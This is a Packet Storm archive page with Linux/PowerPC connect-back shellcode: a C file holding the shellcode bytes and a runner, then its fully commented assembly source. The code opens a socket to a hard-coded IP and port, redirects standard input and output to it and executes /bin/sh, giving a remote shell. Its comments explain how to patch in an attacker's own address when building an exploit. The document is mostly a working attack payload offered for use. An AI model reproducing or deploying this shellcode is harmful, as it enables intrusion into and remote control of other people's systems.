Twenty Year Anniversary

connect-core5.c

connect-core5.c
Posted Nov 8, 2005
Authored by Charles Stevenson | Site bokeoa.com

Linux/ppc shellcode which connects /bin/sh to a host. connect-core5.s is appended.

tags | shellcode, ppc
systems | linux
MD5 | a8eb9079574b6e31bed4cfd4674e1eb8

connect-core5.c

Change Mirror Download
/* connect-core5.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* connect back & execve /bin/sh linux/ppc by core */
"\x7c\x3f\x0b\x78" /*mr r31,r1*/
"\x3b\x40\x01\x0e" /*li r26,270*/
"\x3b\x5a\xfe\xf4" /*addi r26,r26,-268*/
"\x7f\x43\xd3\x78" /*mr r3,r26*/
"\x3b\x60\x01\x0d" /*li r27,269*/
"\x3b\x7b\xfe\xf4" /*addi r27,r27,-268*/
"\x7f\x64\xdb\x78" /*mr r4,r27*/
"\x7c\xa5\x2a\x78" /*xor r5,r5,r5*/
"\x7c\x3c\x0b\x78" /*mr r28,r1*/
"\x3b\x9c\x01\x0c" /*addi r28,r28,268*/
"\x90\x7c\xff\x08" /*stw r3,-248(r28)*/
"\x90\x9c\xff\x0c" /*stw r4,-244(r28)*/
"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/
"\x7f\x63\xdb\x78" /*mr r3,r27*/
"\x3b\xdf\x01\x0c" /*addi r30,r31,268*/
"\x38\x9e\xff\x08" /*addi r4,r30,-248*/
"\x3b\x20\x01\x98" /*li r25,408*/
"\x7f\x20\x16\x70" /*srawi r0,r25,2*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"\x7c\x78\x1b\x78" /*mr r24,r3*/
"\xb3\x5e\xff\x16" /*sth r26,-234(r30)*/
"\x7f\xbd\xea\x78" /*xor r29,r29,r29*/
// Craft your exploit to poke these value in. Right now it's set
// for port 31337 and ip 192.168.1.1. Here's an example
// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1
// 0xc0a8
// 0x0101
"\x63\xbd" /* PORT # */ "\x7a\x69" /*ori r29,r29,31337*/
"\xb3\xbe\xff\x18" /*sth r29,-232(r30)*/
"\x3f\xa0" /*IP(A.B) */ "\xc0\xa8" /*lis r29,-16216*/
"\x63\xbd" /*IP(C.D) */ "\x01\x01" /*ori r29,r29,257*/
"\x93\xbe\xff\x1a" /*stw r29,-230(r30)*/
"\x93\x1c\xff\x08" /*stw r24,-248(r28)*/
"\x3a\xde\xff\x16" /*addi r22,r30,-234*/
"\x92\xdc\xff\x0c" /*stw r22,-244(r28)*/
"\x3b\xa0\x01\x1c" /*li r29,284*/
"\x38\xbd\xfe\xf4" /*addi r5,r29,-268*/
"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/
"\x7f\x20\x16\x70" /*srawi r0,r25,2*/
"\x7c\x7a\xda\x14" /*add r3,r26,r27*/
"\x38\x9c\xff\x08" /*addi r4,r28,-248*/
"\x44\xde\xad\xf2" /*.long0x44deadf2*/
"\x7f\x03\xc3\x78" /*mr r3,r24*/
"\x7c\x84\x22\x78" /*xor r4,r4,r4*/
"\x3a\xe0\x01\xf8" /*li r23,504*/
"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"\x7f\x03\xc3\x78" /*mr r3,r24*/
"\x7f\x64\xdb\x78" /*mr r4,r27*/
"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
// comment out the next 4 lines to save 16 bytes and lose stderr
//"\x7f\x03\xc3\x78" /*mr r3,r24*/
//"\x7f\x44\xd3\x78" /*mr r4,r26*/
//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/
//"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\x35" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ"; /* Z will become NULL */

int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte connect back execve /bin/sh for linux/ppc by core\n",
strlen(hellcode));
shell();
return 0;
}

#;;; PowerPC Linux Connect Back Shellcode
#;;;
#;;; This example connects /bin/sh to 192.168.1.1:31337
#;;;
#;;; by Charles 'core' Stevenson <core@bokeoa.com>
#;;;
#;;; Greetz: lamagra, palante, ghandi, d0tslash, and LSD for their
#;;; significant research without which none of this would be possible.
#;;;
#;;; Fsck: drow for never sharing his shellcode. Security through
#;;; obscurity never lasts forever man what did you expect? :)
#;;;
#;;; Note: Since this code is self modifying it'll crash if you just
#;;; compile the .s and run it directly. ;-) Copy somewhere writable
#;;; or run within gdb
#;;;
#;;; Last Updated: Wed Feb 16 20:14:43 MST 2005
#;;; * Swapped out addi with ori for IPv4 address creation so now
#;;; all IPs should work AFAICT, swapped sc with .long 0x44deadf2
#;;; to save from having to fix the NULL bytes... and removed an
#;;; unnesccesary instruction that got overlooked and left in LOL
#;;;
#;;; Revisions: Thu Aug 21 00:42:28 MDT 2003
#;;; * Fixed opcode, removed uneeded instruction and commented out stderr
#;;; dup2()
#;;; Mon Aug 12 23:12:52 MDT 2002
#;;; * Replaced execve with my own - core

.globl main
main:
#;; Save the stack pointer!!!!!!!!!!!!!!!!!!!!!!!!
#;; This critical step cost me HOURS upon hours in gdb stepping
#;; through one instruction at a time! :/
mr %r31, %r1

#;; This section of the code creates a socket()
#;; file descriptor for use with connect()

#;; The next three sections setup the arguments for the
#;; socket() syscall by storing values in registers 3-5

#;; AF_INET = 2
li %r26, 268 + 2
subi %r26, %r26, 268
mr %r3, %r26

#;; SOCK_STREAM = 1
li %r27, 268 + 1
subi %r27, %r27, 268
mr %r4, %r27

#;; IPPROTO_IP = 0
xor %r5, %r5, %r5 #; IPPROTO_IP

#;; Push the values on the stack
mr %r28, %r1
addi %r28, %r28, 268
stw %r3, -248(%r28)
stw %r4, -244(%r28)
stw %r5, -240(%r28)

#;;; Setup the arguments for socketcall
#;;;
#;; r3 = 1 (socket?)
mr %r3, %r27
#;; r4 = arg pointer
addi %r30, %r31, 268
subi %r4, %r30, 268-20
#;; r0 = __NR_socketcall
li %r25, 102*4 #; save 102
srawi %r0, %r25, 2
.long 0x44deadf2 #;sc

#;; Save the socket file descriptor value
mr %r24, %r3

#;;; This part sets up the sockaddr_in structure for the connect()
#;;; call.
#;; AF_INET = 2
sth %r26, -234(%r30)

#;; PORT (No byte shift needed on BIG endian! :)
xor %r29, %r29, %r29
ori %r29, %r29, 31337 #; elite port X-D
sth %r29, -232(%r30)

#;;; Ok.. here's how you get your ip value into this baby:
#;;;
#;;; This example is for IP address 192.168.0.1:
#;;;
#;;; $ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 0 1
#;;; 0xc0a8
#;;; 0x0001

#;; The first value (first half of X.X.x.x)
lis %r29, 0xc0a8
#;; The second value (last half of x.x.X.X)
ori %r29, %r29, 0x0101
#;; Store the address of the ip
stw %r29, -230(%r30)

#;;; Connect /bin/sh to server at ip and port given
#;;; above. The first steps setup the arguments for the
#;;; syscall.
stw %r24, -248(%r28) #; push socket_fd

subi %r22, %r30, 268-34 #; push &sa
stw %r22, -244(%r28)

li %r29, 268 + 16 #; sizeof(struct sockaddr_in)
subi %r5, %r29, 268
stw %r5, -240(%r28) #; push sizeof(struct sockaddr_in)

srawi %r0, %r25, 2 #; __NR_socketcall(
add %r3, %r26, %r27 #; connect = 3,
subi %r4, %r28, 268 - 20 #; argument pointer);
.long 0x44deadf2 #;sc

#;;; Setup I/O - here we duplicate stdin, stdout, and stderr
#;;; to the socket file descriptor. Basically dup2()
mr %r3, %r24 #; socket_fd
xor %r4, %r4, %r4 #; stdin = 0
li %r23, 63 * 8 #; __NR_dup2 = 63
srawi %r0, %r23, 3
.long 0x44deadf2 #;sc

mr %r3, %r24 #; socket_fd
mr %r4, %r27 #; stdout = 1
srawi %r0, %r23, 3
.long 0x44deadf2 #;sc

#;;; comment out this section to save 16 bytes and lose stderr
#;;; mr %r3, %r24 #; socket_fd
#;;; mr %r4, %r26 #; stderr = 2
#;;; srawi %r0, %r23, 3
#;;; .long 0x44deadf2 #;sc

#;;; execve("/bin/sh",["/bin/sh",NULL],NULL);
#;; GPR5 = 0 and CR = 0
#;; NOTE: xor != xor. (dot means update CR)
#;; *** THANKS GHANDI!!! ***
xor. %r5, %r5, %r5

#;; branch if counter is zero and store the address in
#;; link register (counter is 0 since we just loaded it;)
bdzl main + 200

#;; move the address of main to GPR24
mflr %r24

#;; get offset to /bin/sh
addi %r24, %r24, 268 + 40

#;; add null to end of string
stb %r5, -261(%r24)

#;; store pointer to /bin/sh
subi %r3, %r24, 268
stw %r3, -8(%r1)

#;; r4 = argument pointer
subi %r4, %r1, 8

#;; push environment pointer
stw %r5, -4(%r1)

#;; syscall(__NR_execve)
li %r30, 11*32
srawi %r0, %r30, 5
.long 0x44deadf2 #;sc

#;; /xxx/xxZ do not remove the Z!
.ascii "/bin/shZ"

#;;; EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    17 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close